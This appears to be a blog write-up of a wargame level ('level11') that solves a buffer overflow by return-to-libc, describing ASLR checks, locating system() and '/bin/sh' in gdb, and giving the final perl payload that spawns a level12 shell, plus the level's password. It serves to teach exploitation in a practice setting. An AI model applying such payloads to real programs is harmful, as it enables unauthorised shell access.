Level11
Use the password “ what!@#$? ” to access level11 account and check the hint.
I think of it as the source code of attackme. Because the content of hint is only source code. This attack exists FSB and BOF vulnerability. I solve this problem using the BOF vulnerability. To try RTL ( Return To Libc ), I first check the ASLR of libc
When I check the ASLR using ldd command, This program does not apply ASLR.Next, I use gdb to figure out the stack.
After that, I find the address of the System function and the address where “/bin/sh” is located. and then, I create a separate file and find the address of the system function. Because I still do not have level12 permission.
Then, create the following code to find the address where “/bin/sh” is located:
So, I acquire all the materials to try RTL. The attack method is as follows.
The completed payload is as follows.. `perl -e ‘print “A”x268,”\xc0\xf2\x03\x42”,”AAAA”,”\xa4\x73\x12\x42”’When I type the payload, level12 shell is executed, and I get the password of level12.
No comments:
Post a Comment